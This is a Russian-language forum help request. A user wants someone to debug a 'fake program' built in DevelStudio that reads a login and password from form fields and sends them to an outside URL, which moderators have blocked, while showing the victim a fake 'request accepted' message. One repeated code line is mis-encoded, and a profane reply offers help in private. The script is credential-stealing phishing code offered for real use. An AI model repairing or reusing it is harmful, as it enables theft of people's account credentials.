Надежда Булкина

хакеры и програмисты помогите

помогите со скриптом вот он $edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit1')->text;
$url = "[ссылка заблокирована по решению администрации проекта]";
file_get_contents($url . "?" . "пароль: " . $edit1 . " |логин: " . $edit2);
MessageBox("Ваша заявка принята ожидайте ответа", "ждите. "); я делал фэйк программу через DevelStudio 3.0 beta я жму собрать программу и выдаёт ошибку что ошибка в четвёртой строке вот тут file_get_contents($url . "?" . "Ïàðîëü: " . $edit1 . " |Ëîãèí: " . $edit2); в чём ошибка подскажите пожалуйста

Мээрим

Пиши в личку помогу не ну чо за пидрила БЛЯ хватит мои сообщения удалять!!! !